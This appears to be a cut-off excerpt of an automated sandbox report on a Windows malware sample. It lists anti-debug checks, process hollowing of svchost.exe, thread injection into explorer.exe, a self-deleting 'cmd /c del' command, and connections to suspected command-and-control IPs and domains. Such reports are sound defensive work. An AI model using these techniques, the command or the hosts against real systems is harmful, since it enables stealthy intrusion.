Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A44B mov eax, dword ptr fs:[00000030h]	2_2_0167A44B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01660050 mov eax, dword ptr fs:[00000030h]	2_2_01660050
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01660050 mov eax, dword ptr fs:[00000030h]	2_2_01660050
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DC450 mov eax, dword ptr fs:[00000030h]	2_2_016DC450
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DC450 mov eax, dword ptr fs:[00000030h]	2_2_016DC450
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167BC2C mov eax, dword ptr fs:[00000030h]	2_2_0167BC2C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]	2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]	2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]	2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]	2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01714015 mov eax, dword ptr fs:[00000030h]	2_2_01714015
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01714015 mov eax, dword ptr fs:[00000030h]	2_2_01714015
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]	2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]	2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]	2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]	2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]	2_2_016C7016
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]	2_2_016C7016
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]	2_2_016C7016
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]	2_2_0171740D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]	2_2_0171740D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]	2_2_0171740D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_017014FB mov eax, dword ptr fs:[00000030h]	2_2_017014FB
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_016C6CF0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_016C6CF0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_016C6CF0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718CD6 mov eax, dword ptr fs:[00000030h]	2_2_01718CD6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov ecx, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016890AF mov eax, dword ptr fs:[00000030h]	2_2_016890AF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167F0BF mov ecx, dword ptr fs:[00000030h]	2_2_0167F0BF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167F0BF mov eax, dword ptr fs:[00000030h]	2_2_0167F0BF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167F0BF mov eax, dword ptr fs:[00000030h]	2_2_0167F0BF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649080 mov eax, dword ptr fs:[00000030h]	2_2_01649080
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C3884 mov eax, dword ptr fs:[00000030h]	2_2_016C3884
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C3884 mov eax, dword ptr fs:[00000030h]	2_2_016C3884
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165849B mov eax, dword ptr fs:[00000030h]	2_2_0165849B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164DB60 mov ecx, dword ptr fs:[00000030h]	2_2_0164DB60
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165FF60 mov eax, dword ptr fs:[00000030h]	2_2_0165FF60
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718F6A mov eax, dword ptr fs:[00000030h]	2_2_01718F6A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01673B7A mov eax, dword ptr fs:[00000030h]	2_2_01673B7A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01673B7A mov eax, dword ptr fs:[00000030h]	2_2_01673B7A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164DB40 mov eax, dword ptr fs:[00000030h]	2_2_0164DB40
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165EF40 mov eax, dword ptr fs:[00000030h]	2_2_0165EF40
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718B58 mov eax, dword ptr fs:[00000030h]	2_2_01718B58
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164F358 mov eax, dword ptr fs:[00000030h]	2_2_0164F358
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01644F2E mov eax, dword ptr fs:[00000030h]	2_2_01644F2E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01644F2E mov eax, dword ptr fs:[00000030h]	2_2_01644F2E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167E730 mov eax, dword ptr fs:[00000030h]	2_2_0167E730
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A70E mov eax, dword ptr fs:[00000030h]	2_2_0167A70E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A70E mov eax, dword ptr fs:[00000030h]	2_2_0167A70E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0170131B mov eax, dword ptr fs:[00000030h]	2_2_0170131B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166F716 mov eax, dword ptr fs:[00000030h]	2_2_0166F716
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171070D mov eax, dword ptr fs:[00000030h]	2_2_0171070D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171070D mov eax, dword ptr fs:[00000030h]	2_2_0171070D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DFF10 mov eax, dword ptr fs:[00000030h]	2_2_016DFF10
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DFF10 mov eax, dword ptr fs:[00000030h]	2_2_016DFF10
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016837F5 mov eax, dword ptr fs:[00000030h]	2_2_016837F5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C53CA mov eax, dword ptr fs:[00000030h]	2_2_016C53CA
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C53CA mov eax, dword ptr fs:[00000030h]	2_2_016C53CA
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01715BA5 mov eax, dword ptr fs:[00000030h]	2_2_01715BA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01651B8F mov eax, dword ptr fs:[00000030h]	2_2_01651B8F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01651B8F mov eax, dword ptr fs:[00000030h]	2_2_01651B8F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FD380 mov ecx, dword ptr fs:[00000030h]	2_2_016FD380
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672397 mov eax, dword ptr fs:[00000030h]	2_2_01672397
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01658794 mov eax, dword ptr fs:[00000030h]	2_2_01658794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167B390 mov eax, dword ptr fs:[00000030h]	2_2_0167B390
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]	2_2_016C7794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]	2_2_016C7794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]	2_2_016C7794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0170138A mov eax, dword ptr fs:[00000030h]	2_2_0170138A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165766D mov eax, dword ptr fs:[00000030h]	2_2_0165766D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FB260 mov eax, dword ptr fs:[00000030h]	2_2_016FB260
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FB260 mov eax, dword ptr fs:[00000030h]	2_2_016FB260
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168927A mov eax, dword ptr fs:[00000030h]	2_2_0168927A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718A62 mov eax, dword ptr fs:[00000030h]	2_2_01718A62
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]	2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]	2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]	2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]	2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016D4257 mov eax, dword ptr fs:[00000030h]	2_2_016D4257
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164E620 mov eax, dword ptr fs:[00000030h]	2_2_0164E620
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FFE3F mov eax, dword ptr fs:[00000030h]	2_2_016FFE3F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]	2_2_0164C600
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]	2_2_0164C600
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]	2_2_0164C600
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01678E00 mov eax, dword ptr fs:[00000030h]	2_2_01678E00
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01658A0A mov eax, dword ptr fs:[00000030h]	2_2_01658A0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164AA16 mov eax, dword ptr fs:[00000030h]	2_2_0164AA16
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164AA16 mov eax, dword ptr fs:[00000030h]	2_2_0164AA16
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01663A1C mov eax, dword ptr fs:[00000030h]	2_2_01663A1C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A61C mov eax, dword ptr fs:[00000030h]	2_2_0167A61C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A61C mov eax, dword ptr fs:[00000030h]	2_2_0167A61C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672AE4 mov eax, dword ptr fs:[00000030h]	2_2_01672AE4
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016716E0 mov ecx, dword ptr fs:[00000030h]	2_2_016716E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016576E2 mov eax, dword ptr fs:[00000030h]	2_2_016576E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718ED6 mov eax, dword ptr fs:[00000030h]	2_2_01718ED6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016736CC mov eax, dword ptr fs:[00000030h]	2_2_016736CC
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672ACB mov eax, dword ptr fs:[00000030h]	2_2_01672ACB
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FFEC0 mov eax, dword ptr fs:[00000030h]	2_2_016FFEC0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01688EC7 mov eax, dword ptr fs:[00000030h]	2_2_01688EC7
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C46A7 mov eax, dword ptr fs:[00000030h]	2_2_016C46A7
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]	2_2_01710EA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]	2_2_01710EA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]	2_2_01710EA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0165AAB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0165AAB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167FAB0 mov eax, dword ptr fs:[00000030h]	2_2_0167FAB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DFE87 mov eax, dword ptr fs:[00000030h]	2_2_016DFE87
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167D294 mov eax, dword ptr fs:[00000030h]	2_2_0167D294
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167D294 mov eax, dword ptr fs:[00000030h]	2_2_0167D294

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Code function: 2_2_01689540 NtReadFile,LdrInitializeThunk,

2_2_01689540

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7F9D5 SetUnhandledExceptionFilter,	0_2_00C7F9D5
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C7F838
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00C7FBCA
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C88EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C88EBD

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.221 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.101.152.161 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nordenergogrup.store
Source: C:\Windows\explorer.exe	Domain query: www.sandstormcase.us

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 350000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Thread register set: target process: 3452	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Thread register set: target process: 3452	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 3452	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior

Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000003.00000000.334292418.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304261536.0000000006770000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.324252359.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.260934888.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00C7AF0F

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7F654 cpuid

0_2_00C7F654

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00C7DF1E

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C6B146 GetVersionExW,

